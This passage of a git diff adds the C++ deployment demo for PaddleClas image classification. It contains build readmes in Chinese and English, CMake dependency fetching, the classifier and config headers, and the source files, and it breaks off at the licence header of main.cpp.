如果需要使用CPU预测,PaddlePaddle在Windows上仅支持avx的CPU预测,目前不支持noavx的CPU预测。 +* 在使用生成的`clas_system.exe`进行预测时,如提示`由于找不到paddle_fluid.dll,无法继续执行代码。重新安装程序可能会解决此问题`,请检查是否将Paddle预测库路径添加到系统环境变量,详见[Step1: 下载PaddlePaddle C++ 预测库 paddle_inference_install_dir](#step1-下载paddlepaddle-c-预测库-paddle_inference_install_dir) diff --git a/Smart_container/PaddleClas/deploy/cpp/external-cmake/auto-log.cmake b/Smart_container/PaddleClas/deploy/cpp/external-cmake/auto-log.cmake new file mode 100644 index 0000000..9be9c2f --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/external-cmake/auto-log.cmake @@ -0,0 +1,12 @@ +find_package(Git REQUIRED) +include(FetchContent) + +set(FETCHCONTENT_BASE_DIR "${CMAKE_CURRENT_BINARY_DIR}/third-party") + +FetchContent_Declare( + extern_Autolog + PREFIX autolog + GIT_REPOSITORY https://github.com/LDOUBLEV/AutoLog.git + GIT_TAG main +) +FetchContent_MakeAvailable(extern_Autolog) diff --git a/Smart_container/PaddleClas/deploy/cpp/include/cls.h b/Smart_container/PaddleClas/deploy/cpp/include/cls.h new file mode 100644 index 0000000..600cffb --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/include/cls.h @@ -0,0 +1,91 @@ +// Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. + +#pragma once + +#include "opencv2/core.hpp" +#include "opencv2/imgcodecs.hpp" +#include "opencv2/imgproc.hpp" +#include "paddle_inference_api.h" +#include +#include +#include +#include +#include + +#include +#include +#include + +#include + +using namespace paddle_infer; + +namespace PaddleClas { + +class Classifier { +public: + explicit Classifier(const std::string &model_path, + const std::string ¶ms_path, const bool &use_gpu, + const int &gpu_id, const int &gpu_mem, + const int &cpu_math_library_num_threads, + const bool &use_mkldnn, const bool &use_tensorrt, + const bool &use_fp16, const int &resize_short_size, + const int &crop_size) { + this->use_gpu_ = use_gpu; + this->gpu_id_ = gpu_id; + this->gpu_mem_ = gpu_mem; + this->cpu_math_library_num_threads_ = cpu_math_library_num_threads; + this->use_mkldnn_ = use_mkldnn; + this->use_tensorrt_ = use_tensorrt; + this->use_fp16_ = use_fp16; + + this->resize_short_size_ = resize_short_size; + this->crop_size_ = crop_size; + + LoadModel(model_path, params_path); + } + + // Load Paddle inference model + void LoadModel(const std::string &model_path, const std::string ¶ms_path); + + // Run predictor + double Run(cv::Mat &img, std::vector *times); + +private: + std::shared_ptr predictor_; + + bool use_gpu_ = false; + int gpu_id_ = 0; + int gpu_mem_ = 4000; + int cpu_math_library_num_threads_ = 4; + bool use_mkldnn_ = false; + bool use_tensorrt_ = false; + bool use_fp16_ = false; + + std::vector mean_ = {0.485f, 0.456f, 0.406f}; + std::vector scale_ = {1 / 0.229f, 1 / 0.224f, 1 / 0.225f}; + bool is_scale_ = true; + + int resize_short_size_ = 256; + int crop_size_ = 224; + + // pre-process + ResizeImg resize_op_; + Normalize normalize_op_; + Permute permute_op_; + CenterCropImg crop_op_; +}; + +} // namespace PaddleClas diff --git a/Smart_container/PaddleClas/deploy/cpp/include/cls_config.h b/Smart_container/PaddleClas/deploy/cpp/include/cls_config.h new file mode 100644 index 0000000..d74bb7b --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/include/cls_config.h @@ -0,0 +1,90 @@ +// Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. + +#pragma once + +#include +#include +#include +#include +#include +#include + +#include "include/utility.h" + +namespace PaddleClas { + +class ClsConfig { +public: + explicit ClsConfig(const std::string &config_file) { + config_map_ = LoadConfig(config_file); + + this->use_gpu = bool(stoi(config_map_["use_gpu"])); + + this->gpu_id = stoi(config_map_["gpu_id"]); + + this->gpu_mem = stoi(config_map_["gpu_mem"]); + + this->cpu_threads = stoi(config_map_["cpu_threads"]); + + this->use_mkldnn = bool(stoi(config_map_["use_mkldnn"])); + + this->use_tensorrt = bool(stoi(config_map_["use_tensorrt"])); + this->use_fp16 = bool(stoi(config_map_["use_fp16"])); + + this->cls_model_path.assign(config_map_["cls_model_path"]); + + this->cls_params_path.assign(config_map_["cls_params_path"]); + + this->resize_short_size = stoi(config_map_["resize_short_size"]); + + this->crop_size = stoi(config_map_["crop_size"]); + + this->benchmark = bool(stoi(config_map_["benchmark"])); + } + + bool use_gpu = false; + + int gpu_id = 0; + + int gpu_mem = 4000; + + int cpu_threads = 1; + + bool use_mkldnn = false; + + bool use_tensorrt = false; + bool use_fp16 = false; + bool benchmark = false; + + std::string cls_model_path; + + std::string cls_params_path; + + int resize_short_size = 256; + int crop_size = 224; + + void PrintConfigInfo(); + +private: + // Load configuration + std::map LoadConfig(const std::string &config_file); + + std::vector split(const std::string &str, + const std::string &delim); + + std::map config_map_; +}; + +} // namespace PaddleClas diff --git a/Smart_container/PaddleClas/deploy/cpp/include/preprocess_op.h b/Smart_container/PaddleClas/deploy/cpp/include/preprocess_op.h new file mode 100644 index 0000000..ea352aa --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/include/preprocess_op.h @@ -0,0 +1,56 @@ +// Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. + +#pragma once + +#include "opencv2/core.hpp" +#include "opencv2/imgcodecs.hpp" +#include "opencv2/imgproc.hpp" +#include +#include +#include +#include +#include + +#include +#include +#include + +using namespace std; + +namespace PaddleClas { + +class Normalize { +public: + virtual void Run(cv::Mat *im, const std::vector &mean, + const std::vector &scale, const bool is_scale = true); +}; + +// RGB -> CHW +class Permute { +public: + virtual void Run(const cv::Mat *im, float *data); +}; + +class CenterCropImg { +public: + virtual void Run(cv::Mat &im, const int crop_size = 224); +}; + +class ResizeImg { +public: + virtual void Run(const cv::Mat &img, cv::Mat &resize_img, int max_size_len); +}; + +} // namespace PaddleClas \ No newline at end of file diff --git a/Smart_container/PaddleClas/deploy/cpp/include/utility.h b/Smart_container/PaddleClas/deploy/cpp/include/utility.h new file mode 100644 index 0000000..8dc1524 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/include/utility.h @@ -0,0 +1,46 @@ +// Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. + +#pragma once + +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include + +#include "opencv2/core.hpp" +#include "opencv2/imgcodecs.hpp" +#include "opencv2/imgproc.hpp" + +namespace PaddleClas { + +class Utility { +public: + static std::vector ReadDict(const std::string &path); + + // template + // inline static size_t argmax(ForwardIterator first, ForwardIterator last) + // { + // return std::distance(first, std::max_element(first, last)); + // } +}; + +} // namespace PaddleClas \ No newline at end of file diff --git a/Smart_container/PaddleClas/deploy/cpp/readme.md b/Smart_container/PaddleClas/deploy/cpp/readme.md new file mode 100644 index 0000000..7494148 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/readme.md @@ -0,0 +1,234 @@ +# 服务器端C++预测 + +本教程将介绍在服务器端部署PaddleClas模型的详细步骤。 + + +## 1. 准备环境 + +### 运行准备 +- Linux环境,推荐使用docker。 +- Windows环境,目前支持基于`Visual Studio 2019 Community`进行编译;此外,如果您希望通过生成`sln解决方案`的方式进行编译,可以参考该文档:[https://zhuanlan.zhihu.com/p/145446681](https://zhuanlan.zhihu.com/p/145446681) + +* 该文档主要介绍基于Linux环境下的PaddleClas C++预测流程,如果需要在Windows环境下使用预测库进行C++预测,具体编译方法请参考[Windows下编译教程](./docs/windows_vs2019_build.md)。 + +### 1.1 编译opencv库 + +* 首先需要从opencv官网上下载在Linux环境下源码编译的包,以3.4.7版本为例,下载及解压缩命令如下: + +``` +wget https://github.com/opencv/opencv/archive/3.4.7.tar.gz +tar -xvf 3.4.7.tar.gz +``` + +最终可以在当前目录下看到`opencv-3.4.7/`的文件夹。 + +* 编译opencv,首先设置opencv源码路径(`root_path`)以及安装路径(`install_path`),`root_path`为下载的opencv源码路径,`install_path`为opencv的安装路径。在本例中,源码路径即为当前目录下的`opencv-3.4.7/`。 + +```shell +cd ./opencv-3.4.7 +export root_path=$PWD +export install_path=${root_path}/opencv3 +``` + +* 然后在opencv源码路径下,按照下面的方式进行编译。 + +```shell +rm -rf build +mkdir build +cd build + +cmake .. \ + -DCMAKE_INSTALL_PREFIX=${install_path} \ + -DCMAKE_BUILD_TYPE=Release \ + -DBUILD_SHARED_LIBS=OFF \ + -DWITH_IPP=OFF \ + -DBUILD_IPP_IW=OFF \ + -DWITH_LAPACK=OFF \ + -DWITH_EIGEN=OFF \ + -DCMAKE_INSTALL_LIBDIR=lib64 \ + -DWITH_ZLIB=ON \ + -DBUILD_ZLIB=ON \ + -DWITH_JPEG=ON \ + -DBUILD_JPEG=ON \ + -DWITH_PNG=ON \ + -DBUILD_PNG=ON \ + -DWITH_TIFF=ON \ + -DBUILD_TIFF=ON + +make -j +make install +``` + +* `make install`完成之后,会在该文件夹下生成opencv头文件和库文件,用于后面的PaddleClas代码编译。 + +以opencv3.4.7版本为例,最终在安装路径下的文件结构如下所示。**注意**:不同的opencv版本,下述的文件结构可能不同。 + +``` +opencv3/ +|-- bin +|-- include +|-- lib64 +|-- share +``` + +### 1.2 下载或者编译Paddle预测库 + +* 有2种方式获取Paddle预测库,下面进行详细介绍。 + +#### 1.2.1 预测库源码编译 +* 如果希望获取最新预测库特性,可以从Paddle github上克隆最新代码,源码编译预测库。 +* 可以参考[Paddle预测库官网](https://www.paddlepaddle.org.cn/documentation/docs/zh/develop/guides/05_inference_deployment/inference/build_and_install_lib_cn.html#id16)的说明,从github上获取Paddle代码,然后进行编译,生成最新的预测库。使用git获取代码方法如下。 + +```shell +git clone https://github.com/PaddlePaddle/Paddle.git +``` + +* 进入Paddle目录后,使用如下方法编译。 + +```shell +rm -rf build +mkdir build +cd build + +cmake .. \ + -DWITH_CONTRIB=OFF \ + -DWITH_MKL=ON \ + -DWITH_MKLDNN=ON \ + -DWITH_TESTING=OFF \ + -DCMAKE_BUILD_TYPE=Release \ + -DWITH_INFERENCE_API_TEST=OFF \ + -DON_INFER=ON \ + -DWITH_PYTHON=ON +make -j +make inference_lib_dist +``` + +更多编译参数选项可以参考Paddle C++预测库官网:[https://www.paddlepaddle.org.cn/documentation/docs/zh/develop/guides/05_inference_deployment/inference/build_and_install_lib_cn.html#id16](https://www.paddlepaddle.org.cn/documentation/docs/zh/develop/guides/05_inference_deployment/inference/build_and_install_lib_cn.html#id16)。 + + +* 编译完成之后,可以在`build/paddle_inference_install_dir/`文件下看到生成了以下文件及文件夹。 + +``` +build/paddle_inference_install_dir/ +|-- CMakeCache.txt +|-- paddle +|-- third_party +|-- version.txt +``` + +其中`paddle`就是之后进行C++预测时所需的Paddle库,`version.txt`中包含当前预测库的版本信息。 + +#### 1.2.2 直接下载安装 + +* [Paddle预测库官网](https://www.paddlepaddle.org.cn/documentation/docs/zh/develop/guides/05_inference_deployment/inference/build_and_install_lib_cn.html#id1)上提供了不同cuda版本的Linux预测库,可以在官网查看并选择合适的预测库版本,注意必须选择`develop`版本。 + + 以`ubuntu14.04_cuda9.0_cudnn7_avx_mkl`的`develop`版本为例,使用下述命令下载并解压: + + +```shell +wget https://paddle-inference-lib.bj.bcebos.com/latest-gpu-cuda9-cudnn7-avx-mkl/paddle_inference.tgz + +tar -xvf paddle_inference.tgz +``` + + +最终会在当前的文件夹中生成`paddle_inference/`的子文件夹。 + + +## 2 开始运行 + +### 2.1 将模型导出为inference model + +* 可以参考[模型导出](../../tools/export_model.py),导出`inference model`,用于模型预测。得到预测模型后,假设模型文件放在`inference`目录下,则目录结构如下。 + +``` +inference/ +|--cls_infer.pdmodel +|--cls_infer.pdiparams +``` +**注意**:上述文件中,`cls_infer.pdmodel`文件存储了模型结构信息,`cls_infer.pdiparams`文件存储了模型参数信息。注意两个文件的路径需要与配置文件`tools/config.txt`中的`cls_model_path`和`cls_params_path`参数对应一致。 + +### 2.2 编译PaddleClas C++预测demo + +* 编译命令如下,其中Paddle C++预测库、opencv等其他依赖库的地址需要换成自己机器上的实际地址。 + + +```shell +sh tools/build.sh +``` + +具体地,`tools/build.sh`中内容如下。 + +```shell +OPENCV_DIR=your_opencv_dir +LIB_DIR=your_paddle_inference_dir +CUDA_LIB_DIR=your_cuda_lib_dir +CUDNN_LIB_DIR=your_cudnn_lib_dir +TENSORRT_DIR=your_tensorrt_lib_dir + +BUILD_DIR=build +rm -rf ${BUILD_DIR} +mkdir ${BUILD_DIR} +cd ${BUILD_DIR} +cmake .. \ + -DPADDLE_LIB=${LIB_DIR} \ + -DWITH_MKL=ON \ + -DDEMO_NAME=clas_system \ + -DWITH_GPU=OFF \ + -DWITH_STATIC_LIB=OFF \ + -DWITH_TENSORRT=OFF \ + -DTENSORRT_DIR=${TENSORRT_DIR} \ + -DOPENCV_DIR=${OPENCV_DIR} \ + -DCUDNN_LIB=${CUDNN_LIB_DIR} \ + -DCUDA_LIB=${CUDA_LIB_DIR} \ + +make -j +``` + +上述命令中, + +* `OPENCV_DIR`为opencv编译安装的地址(本例中为`opencv-3.4.7/opencv3`文件夹的路径); + +* `LIB_DIR`为下载的Paddle预测库(`paddle_inference`文件夹),或编译生成的Paddle预测库(`build/paddle_inference_install_dir`文件夹)的路径; + +* `CUDA_LIB_DIR`为cuda库文件地址,在docker中为`/usr/local/cuda/lib64`; + +* `CUDNN_LIB_DIR`为cudnn库文件地址,在docker中为`/usr/lib/x86_64-linux-gnu/`。 + +* `TENSORRT_DIR`是tensorrt库文件地址,在dokcer中为`/usr/local/TensorRT6-cuda10.0-cudnn7/`,TensorRT需要结合GPU使用。 + +在执行上述命令,编译完成之后,会在当前路径下生成`build`文件夹,其中生成一个名为`clas_system`的可执行文件。 + + +### 运行demo +* 首先修改`tools/config.txt`中对应字段: + * use_gpu:是否使用GPU; + * gpu_id:使用的GPU卡号; + * gpu_mem:显存; + * cpu_math_library_num_threads:底层科学计算库所用线程的数量; + * use_mkldnn:是否使用MKLDNN加速; + * use_tensorrt: 是否使用tensorRT进行加速; + * use_fp16:是否使用半精度浮点数进行计算,该选项仅在use_tensorrt为true时有效; + * cls_model_path:预测模型结构文件路径; + * cls_params_path:预测模型参数文件路径; + * resize_short_size:预处理时图像缩放大小; + * crop_size:预处理时图像裁剪后的大小。 + +* 然后修改`tools/run.sh`: + * `./build/clas_system ./tools/config.txt ./docs/imgs/ILSVRC2012_val_00000666.JPEG` + * 上述命令中分别为:编译得到的可执行文件`clas_system`;运行时的配置文件`config.txt`;待预测的图像。 + +* 最后执行以下命令,完成对一幅图像的分类。 + +```shell +sh tools/run.sh +``` + +* 最终屏幕上会输出结果,如下图所示。 + +
+ +
+ + +其中`class id`表示置信度最高的类别对应的id,score表示图片属于该类别的概率。 diff --git a/Smart_container/PaddleClas/deploy/cpp/readme_en.md b/Smart_container/PaddleClas/deploy/cpp/readme_en.md new file mode 100644 index 0000000..fe5abe2 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/readme_en.md @@ -0,0 +1,240 @@ +# Server-side C++ inference + + +In this tutorial, we will introduce the detailed steps of deploying PaddleClas models on the server side. + + +## 1. Prepare the environment + +### Environment + +- Linux, docker is recommended. +- Windows, compilation based on `Visual Studio 2019 Community` is supported. In addition, you can refer to [How to use PaddleDetection to make a complete project](https://zhuanlan.zhihu.com/p/145446681) to compile by generating the `sln solution`. +- This document mainly introduces the compilation and inference of PaddleClas C++ in Linux environment. +- If you need to use the Inference Library in Windows environment, please refer to [The compilation tutorial in Windows](./docs/windows_vs2019_build.md) for detailed information. + + +### 1.1 Compile opencv + +* First of all, you need to download the source code compiled package in the Linux environment from the opencv official website. Taking opencv3.4.7 as an example, the download and uncompress command are as follows. + +``` +wget https://github.com/opencv/opencv/archive/3.4.7.tar.gz +tar -xf 3.4.7.tar.gz +``` + +Finally, you can see the folder of `opencv-3.4.7/` in the current directory. + +* Compile opencv, the opencv source path (`root_path`) and installation path (`install_path`) should be set by yourself. Among them, `root_path` is the downloaded opencv source code path, and `install_path` is the installation path of opencv. In this case, the opencv source is `./opencv-3.4.7`. + +```shell +cd ./opencv-3.4.7 +export root_path=$PWD +export install_path=${root_path}/opencv3 +``` + +* After entering the opencv source code path, you can compile it in the following way. + + +```shell +rm -rf build +mkdir build +cd build + +cmake .. \ + -DCMAKE_INSTALL_PREFIX=${install_path} \ + -DCMAKE_BUILD_TYPE=Release \ + -DBUILD_SHARED_LIBS=OFF \ + -DWITH_IPP=OFF \ + -DBUILD_IPP_IW=OFF \ + -DWITH_LAPACK=OFF \ + -DWITH_EIGEN=OFF \ + -DCMAKE_INSTALL_LIBDIR=lib64 \ + -DWITH_ZLIB=ON \ + -DBUILD_ZLIB=ON \ + -DWITH_JPEG=ON \ + -DBUILD_JPEG=ON \ + -DWITH_PNG=ON \ + -DBUILD_PNG=ON \ + -DWITH_TIFF=ON \ + -DBUILD_TIFF=ON + +make -j +make install +``` + +* After `make install` is completed, the opencv header file and library file will be generated in this folder for later PaddleClas source code compilation. + +Take opencv3.4.7 for example, the final file structure under the opencv installation path is as follows. **NOTICE**:The following file structure may be different for different Versions of Opencv. + +``` +opencv3/ +|-- bin +|-- include +|-- lib64 +|-- share +``` + +### 1.2 Compile or download the Paddle Inference Library + +* There are 2 ways to obtain the Paddle Inference Library, described in detail below. + + +#### 1.2.1 Compile from the source code +* If you want to get the latest Paddle Inference Library features, you can download the latest code from Paddle GitHub repository and compile the inference library from the source code. +* You can refer to [Paddle Inference Library](https://www.paddlepaddle.org.cn/documentation/docs/en/develop/guides/05_inference_deployment/inference/build_and_install_lib_en.html#build-from-source-code) to get the Paddle source code from github, and then compile To generate the latest inference library. The method of using git to access the code is as follows. + + +```shell +git clone https://github.com/PaddlePaddle/Paddle.git +``` + +* After entering the Paddle directory, the compilation method is as follows. + +```shell +rm -rf build +mkdir build +cd build + +cmake .. \ + -DWITH_CONTRIB=OFF \ + -DWITH_MKL=ON \ + -DWITH_MKLDNN=ON \ + -DWITH_TESTING=OFF \ + -DCMAKE_BUILD_TYPE=Release \ + -DWITH_INFERENCE_API_TEST=OFF \ + -DON_INFER=ON \ + -DWITH_PYTHON=ON +make -j +make inference_lib_dist +``` + +For more compilation parameter options, please refer to the official website of the Paddle C++ inference library:[https://www.paddlepaddle.org.cn/documentation/docs/en/develop/guides/05_inference_deployment/inference/build_and_install_lib_en.html#build-from-source-code](https://www.paddlepaddle.org.cn/documentation/docs/en/develop/guides/05_inference_deployment/inference/build_and_install_lib_en.html#build-from-source-code). + + +* After the compilation process, you can see the following files in the folder of `build/paddle_inference_install_dir/`. + +``` +build/paddle_inference_install_dir/ +|-- CMakeCache.txt +|-- paddle +|-- third_party +|-- version.txt +``` + +Among them, `paddle` is the Paddle library required for C++ prediction later, and `version.txt` contains the version information of the current inference library. + + + +#### 1.2.2 Direct download and installation + +* Different cuda versions of the Linux inference library (based on GCC 4.8.2) are provided on the +[Paddle Inference Library official website](https://www.paddlepaddle.org.cn/documentation/docs/en/develop/guides/05_inference_deployment/inference/build_and_install_lib_en.html). You can view and select the appropriate version of the inference library on the official website. + +* Please select the `develop` version. + +* After downloading, use the following method to uncompress. + +``` +tar -xf paddle_inference.tgz +``` + +Finally you can see the following files in the folder of `paddle_inference/`. + + +## 2. Compile and run the demo + +### 2.1 Export the inference model + +* You can refer to [Model inference](../../tools/export_model.py),export the inference model. After the model is exported, assuming it is placed in the `inference` directory, the directory structure is as follows. + +``` +inference/ +|--cls_infer.pdmodel +|--cls_infer.pdiparams +``` + +**NOTICE**: Among them, `cls_infer.pdmodel` file stores the model structure information and the `cls_infer.pdiparams` file stores the model parameter information.The paths of the two files need to correspond to the parameters of `cls_model_path` and `cls_params_path` in the configuration file `tools/config.txt`. + +### 2.2 Compile PaddleClas C++ inference demo + + +* The compilation commands are as follows. The addresses of Paddle C++ inference library, opencv and other Dependencies need to be replaced with the actual addresses on your own machines. + +```shell +sh tools/build.sh +``` + +Specifically, the content in `tools/build.sh` is as follows. + +```shell +OPENCV_DIR=your_opencv_dir +LIB_DIR=your_paddle_inference_dir +CUDA_LIB_DIR=your_cuda_lib_dir +CUDNN_LIB_DIR=your_cudnn_lib_dir +TENSORRT_DIR=your_tensorrt_lib_dir + +BUILD_DIR=build +rm -rf ${BUILD_DIR} +mkdir ${BUILD_DIR} +cd ${BUILD_DIR} +cmake .. \ + -DPADDLE_LIB=${LIB_DIR} \ + -DWITH_MKL=ON \ + -DDEMO_NAME=clas_system \ + -DWITH_GPU=OFF \ + -DWITH_STATIC_LIB=OFF \ + -DWITH_TENSORRT=OFF \ + -DTENSORRT_DIR=${TENSORRT_DIR} \ + -DOPENCV_DIR=${OPENCV_DIR} \ + -DCUDNN_LIB=${CUDNN_LIB_DIR} \ + -DCUDA_LIB=${CUDA_LIB_DIR} \ + +make -j +``` + +In the above parameters of command: + +* `OPENCV_DIR` is the opencv installation path; + +* `LIB_DIR` is the download (`paddle_inference` folder) or the generated Paddle Inference Library path (`build/paddle_inference_install_dir` folder); + +* `CUDA_LIB_DIR` is the cuda library file path, in docker; it is `/usr/local/cuda/lib64`; + +* `CUDNN_LIB_DIR` is the cudnn library file path, in docker it is `/usr/lib/x86_64-linux-gnu/`. + +* `TENSORRT_DIR` is the tensorrt library file path,in dokcer it is `/usr/local/TensorRT6-cuda10.0-cudnn7/`,TensorRT is just enabled for GPU. + +After the compilation is completed, an executable file named `clas_system` will be generated in the `build` folder. + + +### Run the demo +* First, please modify the `tools/config.txt` and `tools/run.sh`. + +* Some key words in `tools/config.txt` is as follows. + * use_gpu: Whether to use GPU. + * gpu_id: GPU id. + * gpu_mem:GPU memory. + * cpu_math_library_num_threads:Number of thread for math library acceleration. + * use_mkldnn:Whether to use mkldnn. + * use_tensorrt: Whether to use tensorRT. + * use_fp16:Whether to use Float16 (half precision), it is just enabled when use_tensorrt is set as 1. + * cls_model_path: Model path of inference model. + * cls_params_path: Params path of inference model. + * resize_short_size:Short side length of the image after resize. + * crop_size:Image size after center crop. + + +* Then execute the following command to complete the classification of an image. + +```shell +sh tools/run.sh +``` + +* The detection results will be shown on the screen, which is as follows. + +
+ +
+ +* In the above results,`class id` represents the id corresponding to the category with the highest confidence, and `score` represents the probability that the image belongs to that category. diff --git a/Smart_container/PaddleClas/deploy/cpp/src/cls.cpp b/Smart_container/PaddleClas/deploy/cpp/src/cls.cpp new file mode 100644 index 0000000..6ce09e7 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/src/cls.cpp @@ -0,0 +1,113 @@ +// Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. + +#include + +namespace PaddleClas { + +void Classifier::LoadModel(const std::string &model_path, + const std::string ¶ms_path) { + paddle_infer::Config config; + config.SetModel(model_path, params_path); + + if (this->use_gpu_) { + config.EnableUseGpu(this->gpu_mem_, this->gpu_id_); + if (this->use_tensorrt_) { + config.EnableTensorRtEngine( + 1 << 20, 1, 3, + this->use_fp16_ ? paddle_infer::Config::Precision::kHalf + : paddle_infer::Config::Precision::kFloat32, + false, false); + } + } else { + config.DisableGpu(); + if (this->use_mkldnn_) { + config.EnableMKLDNN(); + // cache 10 different shapes for mkldnn to avoid memory leak + config.SetMkldnnCacheCapacity(10); + } + config.SetCpuMathLibraryNumThreads(this->cpu_math_library_num_threads_); + } + + config.SwitchUseFeedFetchOps(false); + // true for multiple input + config.SwitchSpecifyInputNames(true); + + config.SwitchIrOptim(true); + + config.EnableMemoryOptim(); + config.DisableGlogInfo(); + + this->predictor_ = CreatePredictor(config); +} + +double Classifier::Run(cv::Mat &img, std::vector *times) { + cv::Mat srcimg; + cv::Mat resize_img; + img.copyTo(srcimg); + + auto preprocess_start = std::chrono::system_clock::now(); + this->resize_op_.Run(img, resize_img, this->resize_short_size_); + + this->crop_op_.Run(resize_img, this->crop_size_); + + this->normalize_op_.Run(&resize_img, this->mean_, this->scale_, + this->is_scale_); + std::vector input(1 * 3 * resize_img.rows * resize_img.cols, 0.0f); + this->permute_op_.Run(&resize_img, input.data()); + + auto input_names = this->predictor_->GetInputNames(); + auto input_t = this->predictor_->GetInputHandle(input_names[0]); + input_t->Reshape({1, 3, resize_img.rows, resize_img.cols}); + auto preprocess_end = std::chrono::system_clock::now(); + + auto infer_start = std::chrono::system_clock::now(); + input_t->CopyFromCpu(input.data()); + this->predictor_->Run(); + + std::vector out_data; + auto output_names = this->predictor_->GetOutputNames(); + auto output_t = this->predictor_->GetOutputHandle(output_names[0]); + std::vector output_shape = output_t->shape(); + int out_num = std::accumulate(output_shape.begin(), output_shape.end(), 1, + std::multiplies()); + + out_data.resize(out_num); + output_t->CopyToCpu(out_data.data()); + auto infer_end = std::chrono::system_clock::now(); + + auto postprocess_start = std::chrono::system_clock::now(); + int maxPosition = + max_element(out_data.begin(), out_data.end()) - out_data.begin(); + auto postprocess_end = std::chrono::system_clock::now(); + + std::chrono::duration preprocess_diff = + preprocess_end - preprocess_start; + times->push_back(double(preprocess_diff.count() * 1000)); + std::chrono::duration inference_diff = infer_end - infer_start; + double inference_cost_time = double(inference_diff.count() * 1000); + times->push_back(inference_cost_time); + std::chrono::duration postprocess_diff = + postprocess_end - postprocess_start; + times->push_back(double(postprocess_diff.count() * 1000)); + + std::cout << "result: " << std::endl; + std::cout << "\tclass id: " << maxPosition << std::endl; + std::cout << std::fixed << std::setprecision(10) + << "\tscore: " << double(out_data[maxPosition]) << std::endl; + + return inference_cost_time; +} + +} // namespace PaddleClas diff --git a/Smart_container/PaddleClas/deploy/cpp/src/cls_config.cpp b/Smart_container/PaddleClas/deploy/cpp/src/cls_config.cpp new file mode 100644 index 0000000..309a470 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/src/cls_config.cpp @@ -0,0 +1,64 @@ +// Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. + +#include + +namespace PaddleClas { + +std::vector ClsConfig::split(const std::string &str, + const std::string &delim) { + std::vector res; + if ("" == str) + return res; + char *strs = new char[str.length() + 1]; + std::strcpy(strs, str.c_str()); + + char *d = new char[delim.length() + 1]; + std::strcpy(d, delim.c_str()); + + char *p = std::strtok(strs, d); + while (p) { + std::string s = p; + res.push_back(s); + p = std::strtok(NULL, d); + } + + return res; +} + +std::map +ClsConfig::LoadConfig(const std::string &config_path) { + auto config = Utility::ReadDict(config_path); + + std::map dict; + for (int i = 0; i < config.size(); i++) { + // pass for empty line or comment + if (config[i].size() <= 1 || config[i][0] == '#') { + continue; + } + std::vector res = split(config[i], " "); + dict[res[0]] = res[1]; + } + return dict; +} + +void ClsConfig::PrintConfigInfo() { + std::cout << "=======Paddle Class inference config======" << std::endl; + for (auto iter = config_map_.begin(); iter != config_map_.end(); iter++) { + std::cout << iter->first << " : " << iter->second << std::endl; + } + std::cout << "=======End of Paddle Class inference config======" << std::endl; +} + +} // namespace PaddleClas \ No newline at end of file diff --git a/Smart_container/PaddleClas/deploy/cpp/src/main.cpp b/Smart_container/PaddleClas/deploy/cpp/src/main.cpp new file mode 100644 index 0000000..4fc191b --- /dev/null +++ b/Smart_container/PaddleClas/deploy/cpp/src/main.cpp @@ -0,0 +1,107 @@ +// Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, 